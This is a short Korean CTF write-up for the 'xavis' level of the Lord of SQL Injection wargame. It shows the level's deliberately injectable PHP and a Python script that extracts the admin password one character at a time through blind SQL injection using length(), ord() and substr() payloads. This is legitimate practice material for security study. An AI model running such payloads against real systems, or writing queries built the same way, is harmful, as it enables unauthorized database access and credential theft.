LOS _Xavis

<?php 
  include "./config.php"; 
  login_chk(); 
  dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/regex|like/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_xavis where id='admin' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysql_fetch_array(mysql_query($query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_xavis where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysql_fetch_array(mysql_query($query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("xavis"); 
  highlight_file(__FILE__); 
?>

Xavis 코드

Get방식으로 pw의 값을 받고

regex, like 가 필터링 되어있음

 

query문

select id from prob_xavis where id='admin' and pw='입력 값'

 

pw의 길이는 40자

 

근데 substr으로 했을 때 모두 0으로 나옴

찾아보니 pw가 유니코드로 되있다고함

한 글자가 4바이트니까

실제 pw의 길이는 유니코드 10자

 

그래서 substr을 ord로 감싸 유니코드 값을 찾음

exploit code

 

 

import requests
 
url = "https://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php"
cookie = {"PHPSESSID": ""}
session = requests.Session()
pwLen = 0
pw = ""
for i in range(50):
    params = {
        "pw":"' or length(pw)={}#".format(i)
    }
    req = session.get(url = url,params = params, cookies = cookie)
    if("Hello admin" in req.text):
        pwLen = i
        print("pwLen is", i,"!!!!!!")
        break
    print(i, "is not")
 
for i in range(1, pwLen//4+1):
    for j in range(257):
        params={
            "pw":"' or ord(substr(pw,{},1))={}#".format(i,hex(j))
        }
        req = session.get(url = url,params = params, cookies = cookie)
        if("Hello admin" in req.text):
            pw += chr(j)
            print(chr(j),"correct!!!!!!!!!")
            break
        print(chr(j), "is not")
 
print("PW is",pw)

 

 

Xavis Clear